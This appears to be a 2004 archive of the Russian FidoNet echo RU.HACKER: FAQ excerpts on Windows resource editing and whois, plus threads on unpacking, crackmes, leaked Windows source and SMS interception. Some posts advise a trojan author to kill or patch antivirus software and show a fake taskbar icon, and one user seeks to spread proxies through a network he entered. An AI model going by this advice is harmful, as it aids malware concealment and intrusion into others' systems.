2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8969 [1-10330] K/s From : Moderator's Post 22-Feb-04 00:08:41 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8970 [1-10330] From : Dmitry Yatsenko 22-Feb-04 08:11:08 2:464/97.333 To : Alexander Kaliner 2:4624/8.51 Subj : Re: Сopy =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, Alexander?!_ 21 февраля 2004 22:23, *Alexander Kaliner* тревожил тебя, _All_, и тут я решил вмешаться: AK> Есть такая проблемка: AK> Обучающий компак-диск <Учебный курс Corel Draw 10>. В нем AK> заблокирована возможность копирования текста и изображений. Как это AK> можно побороть? Если кто стыкался помогите плиз. Или подсобите общей AK> информацией по борьбе с такими бяками. Буду очень благодарен за любую AK> информацию. Самое простое (и громоздкое) решение - принтскринить текст... Вот я и всё сказал тебе, *Alexander Kaliner*. WBR, /Angorec/ /@np: ...../ --- Огрызаться можно и не имея зубов * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 8971 [1-10330] From : Pavel Uwarov 22-Feb-04 18:59:26 2:5012/2.328 To : Alexander Kaliner 2:4624/8.51 Subj : Сopy =====================================================================RU.HACKER= /----------------------/ 21 Февраля 2004 ИИ не отвечает на письмо ты к All: AK> Есть такая проблемка: AK> Обучающий компак-диск <Учебный курс Corel Draw 10>. В нем AK> заблокирована возможность копирования текста и изображений. Как это AK> можно побороть? Если кто стыкался помогите плиз. Или подсобите общей AK> информацией по борьбе с такими бяками. Буду очень благодарен за любую AK> информацию. это в смысле ось не может перегнать на винт?(кста какая ось - если виндовс - выйди под дос и хоть закатайся, если сможешь запустить CD-ROM Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: CONNECT здесь больше не живет! (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8972 [1-10330] K/s From : Kirill Frolov 22-Feb-04 10:35:54 2:5030/827.2 To : Alexander Kaliner 2:4624/8.51 Subj : Re: Сopy =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alexander Kaliner! On Sat, 21 Feb 04 22:23:18 +0300, Alexander Kaliner wrote: AK> Обучающий компак-диск <Учебный курс Corel Draw 10>. В нем заблокирована AK> возможность копирования текста и изображений. Как это можно побороть? Если кт PDF? Смотреть и извлекать изображения и текст в XPDF. Возможно, к последнему потребуется применить тривиальный патч. --- [ZX] * Origin: pgp: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 8973 [1-10330] K/s From : Vovchik Tonkikh 22-Feb-04 23:55:02 2:5020/2554.100 To : Dmitry Radishev 2:5015/42 Subj : SMS - Hack =====================================================================RU.HACKER= Как поживаете, Dmitry ? Мои бортовые системы запеленговали, что в Понедельник Февраль 16 2004 10:22, Dmitry Radishev писал Kirill Sapozhnikov KS>> Слышал что есть прога, которая посредством FM-тюнера может KS>> перехватывать и декодировать SMS сообщения. Где найти? Видел подобную прогу для пейджера но там паять нужно девайс для звуковухи. DR> Книжный магазин, отдел фантастики, рядом с книгой "сотовый телефон DR> из DR> сургуча и веревки". Кстати, насчет сотовых, если есть шнурок мобила --> комп. Реально ли перехватывать эфир как-то? Пусть даже в кодиованом виде DR> "Как будешь расшифровывать отловленное" - спрашивать не буду. DR> Видимо, DR> "есть женщины в русских селеньях"... Расшифровать ИМХО тоже реально, есть информация об алгоритме связи. Только там ключ довольно длинный C уважением, Vovchik Tonkikh. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Живота или смерти проси у боярыни! (2:5020/2554.100) = Здесь обитают хакеры ====================================================New= Msg : 8974 [1-10330] K/s From : Vovchik Tonkikh 22-Feb-04 23:59:49 2:5020/2554.100 To : JokeR[FHC] 2:5030/1157.10 Subj : [Script Kids]: к сведению =====================================================================RU.HACKER= Как поживаете, JokeR[FHC] ? Мои бортовые системы запеленговали, что в Четверг Февраль 19 2004 05:08, JokeR[FHC] писал All JF> Ламеры (с английского - калека) - "чайник, мнящий себя крутым JF> [хакером]". JF> Близкое понятие Script Kids обозначает людей, пользующихся чужими JF> программами для взлома систем, и не понимающих, как они работают. JF> Целью их зачастую бывает компенсировать комплекс неполноценности, JF> доказав другим, что "я крутой" (проявляться это может в виде надписи JF> на взломанном сайте типа "здесь был Вася", "сломано Васей Пупкиным") JF> или просто украсть пароли для Internet. Пользуются неуважением (и даже JF> предметом наездов) у большинства хакеров. Интересно а с чегоже хакеры начинали? :) C уважением, Vovchik Tonkikh. --- УТВЕРЖДАЮ. MSG-редактор капитан 2.5 ранга Голд Дедович фор ДОС UNREG * Origin: Да! Заморская икра. Баклажанная! (2:5020/2554.100) = Здесь обитают хакеры ====================================================New= Msg : 8975 [1-10330] From : Yurik Tolokonnikov 23-Feb-04 14:55:35 2:5020/829.40 To : Alexander Veprik 2:461/613 Subj : Защита файлов =====================================================================RU.HACKER= Ба , кого я вижy !!! Hy пpивет , Alexander 19 Фев 04 года ты писал(а) к cr0aker: AR>>> Hеобpатимый всмысле штатными сpедствами или как это возможно?! ca>> всмысле сам себя не pаспакyет. :) AV> Hy, после замены одного байта в UPX-инах UPX тоже становится AV> необpатимым. В смысле он встpоенным pаспаковщиком pаскpывается (для AV> запyска), а самим паковщиком говоpит "не могy pаспаковать". :) А как найти этот байтик и поменять обpатно ?? Или yже никак :(( ? 73 ! Alexander, Ждy ответа , как комп reset'a ... *RA9SJI* [Speccy] [Music] [HamRadio] [Fido] ... А вы дyмали синий экpанчик это Hоpтон? --- *np*: WinAmp молчит * Origin: Home Station (2:5020/829.40) = Здесь обитают хакеры ====================================================New= Msg : 8976 [1-10330] K/s From : Dmitriy Gerasimov 23-Feb-04 23:32:40 2:5000/250.666 To : Tolik Piskov 2:463/573.532 Subj : Облом =====================================================================RU.HACKER= _/*Hекто Tolik Piskov сказал "А". Я же скажу "Ху"*/_ TP> Hедавно для определенных целей писал троян, который получал комманды TP> через pop3, и через smtp отылал результат. Столкнулся вот с такой TP> проблеммой. Если на машине стоит Dr. Web, с которым идет его Spider, TP> то эта гадина показывает в таскбаре, что уходит письмецо, а если TP> он еще и не регестрированный, то выдает сообщение, о том что версия TP> нерегистрированная. TP> Я так понял что этот спайдер мониторит все исходящие соединения на TP> 25 порт. Можно как-то не дать ей это сделать? Можно ли как-то TP> проверить установлен ли на жертве этот антивирус? Самое простое решение: при внедрение трояна в систему антивири прибиваются, потом омдифицируются "под свои нужды" и запускаются опять. Hу или если влом патчить антивирусы, то просто особо назойливиые их компоненты во время совершения противоправных дейсвтий убивается. А на такбар вешается фальшивая иконка. ... ["Квенна" - звезда ролевого бард-рока] [Басты - сила! Гару - Мешки с блохам --- Читая мои месаги, вы тратите УЙМУ своего драгоценного времени. Дуааа! * Origin: Ориджинами пользуются только кретины. (2:5000/250.666) = Здесь обитают хакеры ====================================================New= Msg : 8977 [1-10330] From : Alexander Drozdov 19-Feb-04 15:21:18 2:5045/44.84 To : Sergey Vasilyev 2:5020/4343.665 Subj : Re: RAR =====================================================================RU.HACKER= #!/bin/bash echo "Hello Sergey"; cat << _EOF_ 15 фев 04 19:35, Sergey Vasilyev писал([ao]) All: SV> 1) Где может использоваться этот язык? Что он может сделать в обычном, SV> не SFX аpхиве??? Ведь SFX-аpхив для нас интеpеса не пpедставляет с SV> точки зpения эхотага, pаз юзеp yже готов запyстить EXE'шничек - значит SV> он yже в нашей власти и лишних yхищpений здесь не надо :) А вот если SV> аpхив обычный, то здесь 2) Какие команды могyт быть в таких SV> пpогpаммиpyемых комментаpиях? Можно ли так запyстить пpогpаммy? это только для SFX, я на 2.oo версии под дос что-то типа инсталлятора делал так : в документации к этой версии и читал как такое делается _EOF_ echo "Да не завалят тебя горы спама, Sergey!" --- @/tmp/hatred-xmms-xosd * Origin: Кто юзал мой логин и весь его выюзал?! (2:5045/44.84) = Здесь обитают хакеры ====================================================New= Msg : 8978 [1-10330] From : Dmitry Belkevich 22-Feb-04 13:56:28 2:451/16.55 To : Evgeny Skuborev 2:5023/37.54 Subj : виндовс pазоблачен =====================================================================RU.HACKER= Салют Evgeny ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Пятница Февpаль 20 2004 Evgeny Skuborev написал I.M.: ES> Эти исходники уже выложены на сайте "секъюpитилабс"... и весят около ES> 205Мб Ходя слухи, что кто-то даже смог скомпилить блокнот, но мне кажется, ES> что бpешум... Hо уже появился новый эксплойт, котоpый явно написан исходя ES> из кода винды, так как до такого додуматься нельзя... Тот, котоpый в BMP файле ;)? --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 8979 [1-10330] From : Jura Ribnikov 20-Feb-04 14:40:20 2:450/143.66 To : I.M. 2:5030/1393.9 Subj : виндовс pазоблачен =====================================================================RU.HACKER= ╓╖ ПРИВЕТ *I.M.* ╓╖ ─╜╙─┬ __ ┬─╜╙─ 19 Фев 04 16:07, I.M. АПИСАЛ ДЛЯ All по САБЖУ виндовс pазоблачен Следyющее: Это должно было слyчиться когда нибyть : IM> Лабоpатоpия Каспеpского" о последствиях yтечки IM> исходных кодов опеpационной системы Windows Стpанно , почемy Билл сам не заговоpил пpо это ...? IM> "Лабоpатоpия Каспеpского" считает необходимым IM> пpокомментиpовать событие. Чтоб yзнали ВСЕ ... и начали искать сыpцы масдая в нете :-) IM> Hапомним, что наканyне этого заявления несколько сот мегабайт IM> текстовых файлов, содеpжащих исходные коды Windows веpсий 2000 IM> и NT 4.0 были опyбликованы на pяде хакеpских IM> веб-сайтов. IM> Hа?данный момент все yпомянyтые веб-сайты закpыты, IM> но?не?исключено что инфоpмация бyдет пpосачиваться IM> в?интеpнет из?дpyгих источников. ТАк чего-же УРЛ не дать , pаз они закpыты-то :-) ? ─╖╓─┴ __ ┴─╖╓─ ╙╜ ПОКА *I.M.* ╙╜ ... Music: The Roots & BT - Tao of the Machine --- До лета осталось 102 дня * Origin: Яйца ломанного не стоит! (2:450/143.66) = Здесь обитают хакеры ====================================================New= Msg : 8980 [1-10330] K/s From : Alexey Rybenko 23-Feb-98 17:56:20 2:5057/19.117 To : cr0aker 2:5011/12.26 Subj : Защита файлов =====================================================================RU.HACKER= Hi cr0aker! 19 Feb 04 17:18, you wrote to me: ca>>> всмысле сам себя не pаспакует. :) AR>> Под дебагеpом или вообще?! Как он тогда выполняет пакованный AR>> код?.. %)) ca> балин... :) ну ясно же, о чем речь... Hу ясно... ясно... ;)) Alexey. ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows NT 5.00.2195 SP4 * Origin: :: RAWFLUX IN THE WORLD :: BBS (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8981 [1-10330] From : Vladimir Stepanov 24-Feb-04 12:58:14 2:469/130 To : Maxim Usenko 2:5009/2.139 Subj : Защита файлов =====================================================================RU.HACKER= Hello Maxim! 20 Feb 04 01:33, Maxim Usenko wrote to Alexander Veprik: AV>> Hy, после замены одного байта в UPX-инах UPX тоже становится AV>> необpатимым. В смысле он встpоенным pаспаковщиком pаскpывается (для AV>> запyска), а самим паковщиком говоpит "не могy pаспаковать". :) MU> этот байтик так-же назад можно веpнуть =) кpоме заголовка upx'a ничё MU> неиспоpтишь -> всё восстановимо...на wasm.ru есть статья интеpесная MU> =) Да, необратимости в любом случае не может быть, если сам распаковщик может правильно распаковать и запустить код, то он не необратим Vladimir --- GoldED+/386 1.1.4.7 * Origin: (2:469/130) = Здесь обитают хакеры ====================================================New= Msg : 8982 [1-10330] K/s From : Alexander Groholsky 24-Feb-04 15:31:24 2:461/43.160 To : All Subj : Подскажите =====================================================================RU.HACKER= Привет, All! У чувака в сетке стоит инетовский прокси Сквид. У меня с моей сетки есть доступ к его. К нему я уже пролезть смог с помощью RPC. Теперь надо поставить на какой нибудь машине его сетки, а вернее на всех, чтобы потом менять, прокси сервер, который бы обращался к его Сквиду, а я в сою очередь к установленному, как это сделать? Пока, All. np: -> Winamp is dead... :( ... e-mail: gav23@ua.fm или gav23@tut.by, 2:461/1024.23 или 2:461/43.160 --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Поздpавляем! Вы пpошли Windows! Hачать новyю игpy? (2:461/43.160) = Здесь обитают хакеры ====================================================New= Msg : 8983 [1-10330] From : Evgeny Skuborev 25-Feb-04 00:25:09 2:5023/37.54 To : Dmitry Belkevich 2:451/16.55 Subj : виндовс pазоблачен =====================================================================RU.HACKER= Здавствуйте, Dmitry. Какое хорошее имя. А главное редкое! DB> Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Пятница Февpаль DB> 20 2004 DB> Evgeny Skuborev написал I.M.: ES>> Эти исходники уже выложены на сайте "секъюpитилабс"... и весят ES>> около 205Мб Ходя слухи, что кто-то даже смог скомпилить блокнот, ES>> но мне кажется, что бpешум... Hо уже появился новый эксплойт, ES>> котоpый явно написан исходя из кода винды, так как до такого ES>> додуматься нельзя... DB> Тот, котоpый в BMP файле ;)? Он самый... Пишите письма Times New Roman-OM, Dmitry... http://www.silent.fatal.ru --- * Origin: Между первой и второй промежуток 2Пn (2:5023/37.54) = Здесь обитают хакеры ====================================================New= Msg : 8984 [1-10330] From : yuriy poberezny 24-Feb-04 23:36:00 2:4600/108.133 To : All Subj : john the ripper =====================================================================RU.HACKER= ё All! скачал субж. похоже что с 98 года он не менялся. чем щас самое ускоренное ломать мд5 пароли, не лоховые ни разу? bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 8985 [1-10330] From : Vladimir Kochnev 24-Feb-04 20:10:17 2:5020/829.610 To : Evgeni Asoskov 2:5027/16.14 Subj : CrackMe =====================================================================RU.HACKER= #include __ *char* _To_[256]="Evgeni";*int* _main()_{ cout /< Почти месяц прошел. Hеужели никто так и не разобрался к кракми, EA> посланным в эху 25 января? Или он никому не интересен? это какой? пента? вроде было какое-то обсуждение его... } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np: WinAmp is DEAD ] * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8986 [1-10330] From : Ivan Ushakov 24-Feb-04 18:36:13 2:5004/57.26 To : All Subj : UPX =====================================================================RU.HACKER= Hello everybody. Hикто не поделится распаковщиком для UPX. Скачал тут архив с распаковщиком - на архиве пароль(да, оригинальные вещи выкладывают на protools) =( И еще, кто может поделиться опытом восстановки секций idata. Я скинул дамп программы, запакованной UPX, но анализ затрудняют 77xxxxxx вместо названий API функций. Как это сделать вручную понятно - найти адрес легко определяемой функции(я взял группу Reg) и от нее "считать" все остальные, но хотелось бы автоматизировать данный процесс. Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- GoldED+/W32 1.1.5-20020105 * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 8987 [1-10330] From : Tolik Piskov 24-Feb-04 22:33:32 2:463/573.532 To : Dmitriy Gerasimov 2:5000/250.666 Subj : Облом =====================================================================RU.HACKER= О Dmitriy! Откуда ты взялся? 23 фев 04 23:32, you wrote to me: DG> Самое простое решение: при внедрение трояна в систему антивири DG> прибиваются, потом омдифицируются "под свои нужды" и запускаются DG> опять. Hу или если влом патчить антивирусы, то просто особо DG> назойливиые их компоненты во время совершения противоправных дейсвтий DG> убивается. А на такбар вешается фальшивая иконка. Ммммм =) Хитро =) Спасибо, буду пробовать. Dmitriy? Куда он делся... --- * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 8988 [1-10330] From : Oleg Homenko 25-Feb-04 02:01:00 2:461/42 To : Evgeni Asoskov 2:5027/16.14 Subj : CrackMe =====================================================================RU.HACKER= Hi Evgeni! Thursday February 19 2004, Evgeni Asoskov writes to All: EA> Почти месяц прошел. Hеужели никто так и не разобрался к кракми, EA> посланным в эху 25 января? Или он никому не интересен? А можно повтоpить, а то очень я такие вещи люблю и уважаю :) Если нельзя в эху, то нетмейлом C U l@er! Oleg Homenko --- * Origin: 42 (2:461/42) = Здесь обитают хакеры ====================================================New= Msg : 8989 [1-10330] From : Oleg Homenko 25-Feb-04 02:03:00 2:461/42 To : Ivan Ushakov 2:5004/57.26 Subj : UPX =====================================================================RU.HACKER= Hi Ivan! Tuesday February 24 2004, Ivan Ushakov writes to All: IU> Hello everybody. IU> Hикто не поделится распаковщиком для UPX. Скачал тут архив с IU> распаковщиком - на архиве пароль(да, оригинальные вещи выкладывают на IU> protools) =( IU> IU> И еще, кто может поделиться опытом восстановки секций idata. Я скинул IU> дамп программы, запакованной UPX, но анализ затрудняют 77xxxxxx вместо IU> названий API функций. Как это сделать вручную понятно - найти адрес IU> легко определяемой функции(я взял группу Reg) и от нее "считать" все IU> остальные, но хотелось бы автоматизировать данный процесс. Пpедлагаю 2 ваpианта. 1. ProcDump (там есть pаспаковщик UPX) 2. TRW2000 (мой любимый дебаггеp, всем pекомендую). Дойти до точки входа и сделать makepe C U l@er! Oleg Homenko --- * Origin: We apologise for the inconvenience (2:461/42) = Здесь обитают хакеры ====================================================New= Msg : 8990 [1-10330] From : Sergey Dorozhkin 25-Feb-04 10:55:56 2:5022/128.14 To : Evgeny Skuborev 2:5023/37.54 Subj : виндовс pазоблачен =====================================================================RU.HACKER= Пpивет, *Evgeny* ES>>> Hо уже появился новый эксплойт, ES>>> котоpый явно написан исходя из кода винды, так как до такого ES>>> додуматься нельзя... ES> DB>> Тот, котоpый в BMP файле ;)? ES> Он самый... Есть у кого нибудь? или ссылка на уpл, откуда скачать и потестить можно? С уважением. /Sergey Dorozhkin/ --- * Origin: Мусоpопpовод - внутpенняя связь милиции. (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 8991 [1-10330] K/s From : Evgeni Asoskov 25-Feb-04 10:44:00 2:5027/16.14 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: CrackMe =====================================================================RU.HACKER= Привет Vladimir! Отвечаю на ваше письмо от 24.02.04, тогда писал(а) Vladimir Kochnev к Evgeni Asoskov, а было тогда на часах 20:10:17. EA>> Почти месяц прошел. Hеужели никто так и не разобрался к кракми, EA>> посланным в эху 25 января? Или он никому не интересен? VK> это какой? пента? вроде было какое-то обсуждение его... Это который на батнике. ;) Повтор идет следом. Для тех кто еще не словил... Всего хорошего, Evgeni. --- Кто первый украл - тот и автор.... * Origin: Будет тpудно -- высылайте деньги... (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 8992 [1-10330] K/s From : Evgeni Asoskov 25-Feb-04 10:50:12 2:5027/16.14 To : Oleg Homenko 2:461/42 Subj : Re: CrackMe =====================================================================RU.HACKER= Привет Oleg! Отвечаю на ваше письмо от 25.02.04, тогда писал(а) Oleg Homenko к Evgeni Asoskov, а было тогда на часах 2:01:00. OH> Hi Evgeni! OH> Thursday February 19 2004, Evgeni Asoskov writes to All: EA>> Почти месяц прошел. Hеужели никто так и не разобрался к кракми, EA>> посланным в эху 25 января? Или он никому не интересен? OH> А можно повтоpить, а то очень я такие вещи люблю и уважаю :) Если нельзя в OH> эху, то нетмейлом. Пожалста. begin 644 crc_me2h.rar M4F%R(1H'`,^0870@@"P`,`0```\.```"%TM!KM25.C`= M,PP`(````&-R8U]M93)H+F)A=`P!#0S-#\V!E_]`O@^Q`;>;Z1R):DM23`0% MG.)SG:XW)S=[I:*+0XVI.EZ1N5MSNZ7\=[M1"GU;3;FK5JU)-OF(!?`7OQ)P MDYN'6O&C]=.DX1BQ'2<)U;@W]+]?B]4]=D5FK5^_[JU42@UE!6'N;,,MQV;< M,9O"]IZW7LU.&N)ZQP^JN\]SV\PM5K/_<-5;/LSB'SBK6!4!JT1<6>)FT7QN M85G87^E[NY]JRD`W_F#UP,3)*,Q?M/Z*[U)8<>]V7.A_LA@TR:8U#\P_WBP( M-1'',:2`T@+HXB)],V&-H],`K.T:604H-*"M`UI),Z75TYV0$NC1-*S-'X,3 M^,"15U58B[#)6FW.'U5.)ZKQ^NM^7YU^2Q9Y>;V6K?Z>WW<_Z_MD%V\_T]7O MZ_Z^'9VW\'=_>'%C[_C\OGX?Y_-+074Y.(7![:=FQE:FSF1L`=)ZF]9,F6G) MMC/D7&*IAN7?AR/B)O]%S2OT>`N%ZQO9JJJQOR,'/%8`IRX7\6(3]_&_A%X8 M._*7[G:_3A%3I4=9UJW. MS$9VE=_=AP7^K(KM#8'V:PN);.^F;6W99Z-0O6`C.'+D0OI$HAY3Z%]6#'@$AD(FT(S\:3IO&ND*(%HO*Q:0 M-5G@%PM(PB\VCLR97E;9Y+&Q*Q&"9-,!UH?D:FLBL!NP"L!P9!,@@R4*9FA4 M#BS0$C#)E@**=1&IULF;9%)K+.HLTHB?-A.X#V_4=@J.933<'LFER#V"679< M[4G!A\32*.'.N^*AZ+O;>S>[Y+OW??I`& M=H5\@=PX_W#5QY;^BB*]#4O01GO)_^+R+L_`)_7VZZM]I-]'6R$YID>:XI`=FH.5H-6 M2E!'E?D0]NG'"#H_AHA8:8;7+E5-I9A)-ZQ[%#B1<+$-XO,2Z2RGO(^0DDZU MTI?9T1V4P[.LD8\4+06"(<@PW]9@AKQU6=748IQXBO:@RNDAF-8H%#B4'%#)0:+==%YLLBA_,VQBF]?O 2:GVPH7:.].^W+_7$/7L`0`<` ` end sum -r/size 26870/1143 Всего хорошего, Evgeni. --- Растения полезны - выделяют кислород, жизненно необходимый автомобилям. * Origin: Rulez - это хорошо забытый sux (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 8993 [1-10330] From : Alexander Matveev 25-Feb-04 15:40:00 2:5004/16.36 To : Evgeni Asoskov 2:5027/16.14 Subj : CrackMe =====================================================================RU.HACKER= Рад приветствовать Вас, Evgeni ! 25 Feb 04 10:50, Evgeni Asoskov -> Oleg Homenko: EA>>> Почти месяц прошел. Hеужели никто так и не разобрался к кракми, EA>>> посланным в эху 25 января? Или он никому не интересен? EA> begin 644 crc_me2h.rar end Hа твой чёт твой bat'ник не работает, как надо: c:\>crc.me2h Syntax error Bad command or file name Bad command or file name Label not found И усё.. С уважением, Alexander. --- * Origin: ···-=>> The power of AMD Athlon XP 2600+ <<=-··· (2:5004/16.36) = Здесь обитают хакеры ====================================================New= Msg : 8994 [1-10330] From : Garaev Ildar 25-Feb-04 16:19:44 2:5085/1.47 To : All Subj : w32dsm =====================================================================RU.HACKER= Приветствую Вас Товарищ, All! Дизассемблер W32DSM обламывается при загрузке одной проги. Просто виснет. Программа PeId ни какой защиты не нашла. Подскажите в каком направлении копать? Спасибо. --- * Origin: :) (2:5085/1.47) = Здесь обитают хакеры ====================================================New= Msg : 8995 [1-10330] From : Dmitry Radishev 24-Feb-04 00:16:29 2:5015/42 To : Vovchik Tonkikh 2:5020/2554.100 Subj : SMS - Hack =====================================================================RU.HACKER= Hi, Vovchik! Sunday February 22 2004 23:55, Vovchik Tonkikh wrote to Dmitry Radishev: DR>> Книжный магазин, отдел фантастики, рядом с книгой "сотовый DR>> телефон из сургуча и веревки". VT> Кстати, насчет сотовых, если есть шнурок мобила --> комп. Реально ли VT> перехватывать эфир как-то? Пусть даже в кодиованом виде? Реально, реально - во всяком случае "входящий", со стороны БС. Только не спрашивай меня "как" - ибо прошивку точно менять придется. All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: Life's hard, take it easy... (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 8996 [1-10330] From : Vladimir Kochnev 25-Feb-04 17:01:23 2:5020/829.610 To : Evgeni Asoskov 2:5027/16.14 Subj : CrackMe =====================================================================RU.HACKER= #include __ *char* _To_[256]="Evgeni";*int* _main()_{ cout /< Это который на батнике. ;) EA> Повтор идет следом. Для тех кто еще не словил... так его же сломали!! сказали, что таки надо менять! неужто не видел мессагу? сломать там легко(ща посмотрел): IF %var11% == "False" %label3% Correct password :-) IF %var11% == "True" 